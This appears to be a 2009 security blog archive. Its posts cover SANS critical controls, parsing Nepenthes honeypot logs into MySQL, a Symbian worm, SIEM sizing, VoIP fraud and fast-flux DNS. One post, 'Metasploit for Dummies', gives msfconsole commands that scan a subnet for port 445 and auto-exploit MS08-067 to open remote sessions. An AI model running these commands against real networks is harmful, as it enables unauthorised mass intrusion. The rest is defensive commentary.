Saturday, February 28, 2009

What To Do If Your Web Site Has Been Hacked by Phishers

This a high level document by APWG that explain that steps you should take if your web server is used in a phishing attack, it will also give you an idea how to identify web sites phishing attacks, with things like traffic monitoring, File system inspection, Server configuration inspection, and event logging.

Thursday, February 26, 2009

Control Based Security

SANS released a draft paper on the most important 20 controls for effective cyber defence, the list is very well defined, and makes a lot of sense.... 
  1. Inventory of Authorized and Unauthorized Hardware.
  2. Inventory of Authorized and Unauthorized Software.
  3. Secure Configurations for Hardware and Software on Laptops, Workstations, and Servers.
  4. Secure Configurations of Network Devices Such as Firewalls and Routers.
  5. Boundary Defense
  6. Maintenance and Analysis of Complete Security Audit Logs
  7. Application Software Security
  8. Controlled Use of Administrative Privileges
  9. Controlled Access Based On Need to Know
  10. Continuous Vulnerability Testing and Remediation
  11. Dormant Account Monitoring and Control
  12. Anti-Malware Defenses
  13. Limitation and Control of Ports, Protocols and Services
  14. Wireless Device Control
  15. Data Leakage Protection
  16. Secure Network Engineering
  17. Red Team Exercises
  18. Incident Response Capability
  19. Data Recovery Capability
  20. Security Skills Assessment and Training to Fill Gaps

Monday, February 23, 2009

Importing Nepenthes honeypot logs into Mysql

This is a quick and dirty way of importing Nepenthes submissions log into mysql database, then use php to generate some statistics.

The first part is to prepare the logs:
cat sub |grep http://|sed 's/\[//'|sed 's/\]//'|sed -e 's/->/ /g' | sed 's/http:/ http/g' | sed 's/:/ /3g' |sed 's\/\ \g' |sed 's/T/ /'|sed 's/ /,/g2'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_http

cat sub |sed 's/\[//'|sed 's/\]//'|grep link://|sed -e 's/->/ /g' | sed 's/http:/ /g' | sed 's/:/ /3g' |sed 's\//\ \' |sed 's\/\ \'|sed 's/T/ /'|sed 's/ /,/g2'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_link

cat sub |grep tftp://|sed 's/\[//'|sed 's/\]//'|sed -e 's/->/ /g' | sed 's/:/ /3g' |sed 's\/\ \g' |sed 's/T/ /'|sed 's/ /,/g2'|sed 's/,,,/,/g'|sed 's/,,/,/g' >db_tftp

cat sub |grep ' ftp'|sed 's/\[//'|sed 's/\]//'|sed 's\/\ \g' |sed 's/T/ /'|sed -e 's/->/ /g'|sed 's/:/ /3g'| sed 's/@/ /g'|awk '{print $1,$2,$3,$4,$5,$8,$9,$10,$11}'|sed 's/ /,/g2'|sed 's/,,,/,/g'|sed
's/,,/,/g' >db_ftp

The above 4 lines will parse the submissions log and generate 4 different files "db_http, db_ftp, db_tftp, and db_link", these files are ready to be imported in the database with the below fields:
"date, time, attacker_ip,sensor,protocol, malware_srv,malware_srv_port,file,md5 "

Now it is easy to create a database with the above fields and import the 4 generated files into it.

#mysql --user=root --password=password

USE nepenthes;

CREATE TABLE submissions (
date datetime NOT NULL default '0000-00-00 00:00:00',
attacker_ip varchar(80) NOT NULL default '',
sensor varchar(80) NOT NULL default '',
protocol varchar(80) NOT NULL default '',
malware_srv varchar(80) NOT NULL default '',
malware_srv_port varchar(80) NOT NULL default '',
file varchar(80) NOT NULL,
md5 varchar(80) NOT NULL

ALTER TABLE submissions ADD `uniqueid` VARCHAR(32) NOT NULL default '';
ALTER TABLE submissions ADD INDEX ( `attacker_ip` );
ALTER TABLE submissions ADD INDEX ( `sensor` );
ALTER TABLE submissions ADD INDEX ( `malware_srv` );
ALTER TABLE submissions ADD INDEX ( `md5` );

LOAD DATA INFILE '/usr/local/src/nepenthes/db_http' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_tftp' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_ftp' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
LOAD DATA INFILE '/usr/local/src/nepenthes/db_local' INTO TABLE submissions FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';

Please note and change the 4 files location above according to location of your files.

Now you will have the logs uploaded in your database.
The next step is to automate this process, I will not go through the automation, but it should be easy using a daily cron tab job on nepenthes sensor to stop nepenthes, rename the submissions log file, send the renamed file to a remote reporting server, where the above import operation will take place also using a daily cron job.

The second part is to generate a web reports with geoip location, I have used maxmind free geoip country database, first install maxmind light database locally then use the sample code below, it is just a proof of concept, you should spend some time on it to be user friendly...

Sunday, February 22, 2009

New worm on Nokia mobiles

Symbian based mobiles running S60 3rd edition are targeted by a new worm, the worm will propagate by sending SMS from the infected mobile's phone book, the SMS contains a URL, once clicked it will install the malware, and it will send some personal information to a remote server on the internet.
The worm is called SymbOS/Yxes.A!, and the only aim is to collect data about the users, it seems that this is just the beginning of a large mobile spam attack.

This is not the first malware on Symbian-based devices, it seems that it getting more attention from the bad guys.!worm

Two Critical Vulnerabilities

MS09-002 is another Internet Explorer critical vulnerability that allow for remote code execution, patch is available from Microsoft.

CVE-2009-0658 is another PDF vulnerability that allow for code execution, there is no patch available yet, however most Anti-Virus vendor should have the signature updated.

Reports are showing that hackers are now actively exploiting those 2 critical vulnerabilities, so again everyone should:
- Patch your systems
- Make sure that your Anti-Virus is updated.

Sunday, February 15, 2009

Metasploit for Dummies

Metasploit are giving out a very simple step-by-step sample for exploiting the latest MS08-067 vulnerability from the msfconsole.

The below steps will scan hosts on subnet AAA.BBB.CCC.0/24 for open port 445, and launch the exploit against the active hosts.

msf > load db_sqlite3
msf > db_create
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
msf > db_autopwn -e -p -b -m ms08_067

Then view the opened sessions by:
msf > sessions -l
msf > sessions -i 1

For writing shellcode, check Generating Shellcode Using Metasploit

Thursday, February 12, 2009

Finding Alternate Data Stream

Alternative Data Stream can be used to hide malware, beside its legitimate use.
AlternateStreamView is a small free tool to scan any NTFS Drive for all ADS.

Sunday, February 8, 2009

Security Information Event Management (SIEM)

If you are considering implementing Security Information Event Management (SIEM), SANS has produced a very good whitepaper on some design issues, with a sample case study.

The paper is about benchmarking the SIEM, however it does not cover all requirements for such project, such as integration with other systems, transport mechanisms, ports and protocols, change control, usability, storage type, integration with physical security,reporting capabilities, work-flow management, false positive rate....etc.

Here are some points to consider:
- Do we need all log data? How much data can the network and collection tools actually handle under load?
- What is the threshold before the network bottleneck and/or the SIEM is considered unusable?
- The true value of SIEM is MTTR (Mean Time To Remediate), that shows the ability of handling incident response.
- Calculating the EPS (Events per Second) in normal situation and in Peak load.
- Listing all devices, taking into consideration future changes.

The benchmarking process was done on a case with 750 users, 5 offices, 6 subnets, 5 Databases, central Data center, 4 Firewalls, 6 IPS, 6 switches, 6 routers.

- It is unlikely that all devices will send logs at max. at the same time
- Logs using TCP is much better that UDP, as UDP packets will be dropped at 3000 EPS, while TCP could maintain a 100,000 EPS.

Calculating the Storage is also important, considering a 20,000 EPS over 8 hours of ongoing incident will require 576 million record, using 300 byte avg. size, the storage needed is over 170 GB of data. The storage can differ from local DB to archiving DB, with encryption requirements.

Saturday, February 7, 2009

SANS 2008 Salary & Certification Survey

It is an interesting survey, here are some points to consider:

- Digital Forensics, Penetration Testing, and Intrusion Detection are the most interesting topics to be learned in 2009

- The highest planned technology implementations in 2009:
       Configuration Management
       Storage Security
       Wireless Security
       Incident Management

- The highest "NOT in 2009" technologies:
     Identity and Access Management
     Database Security
- Out of top 15 certifications, 11 GIAC certificates are among the top.

Wednesday, February 4, 2009

VoIP Fraud for Telco Providers

Presentation by British Telecom about Fraud, the interesting part is bypassing the international call fees by terminating the calls on the internet.
While it is not new, but one of new ideas in this area is using WiMax to extend the internet link to few kilometers to avoid physical detection, another idea is to use GSM SIM cards across borders, specifically using SIM from country A within country B, which will avoid the legal problems for VoIP termination.

Next generation fraud is about Residential Gateway (Triple Play or VoIP) Abuse, WiFi reselling, botnets, and DDOS.

The presentation is one year old, but it is still relevant.

Monday, February 2, 2009

Security by Video

Lots of security tutorial videos are now available online, topics like socket programming basics, IPv6, Cryptography, cracking WEP, .....
The list is growing, go check it.

Sunday, February 1, 2009

Fast Flux, ICANN Working Group Report

ICANN just released an initial report about Fast-Flux for public comments

The ICANN Fast Flux working group is trying to gather information that might help in initiating a formal policy development process or exploring other means to address this issue, in addition to explore the possibility to develop a Fast Flux Data Reporting System (FFDRS).

Fast Flux characteristics:
- Multiple IPs per NS, spanning multiple ASN
- Frequent NS changes (Double Fast-Flux)
- or IPs located within consumer broadband blocks
- Domain name age is short
- Fraudulent WHOIS records
- Usage of "nginx" proxy on infected machines

- Motherships are the controlling element of fast-flux network exactly like C&C servers to the botnets
- Motherships are hidden by front-end fast flux proxy nodes

Proxy Redirection:
- Fluxed hosts are typically proxies that re-direct traffic to the attacker's actual content
- Adds a 2nd layer of obfuscation to fast flux

Legitimate use of Fast Flux:
Fast Flux techniques using short dns TTL are used for:
- Load balancing high capacity systems
- Rapid update to propagate changes quickly
- Free-speech groups- dynamic DNS services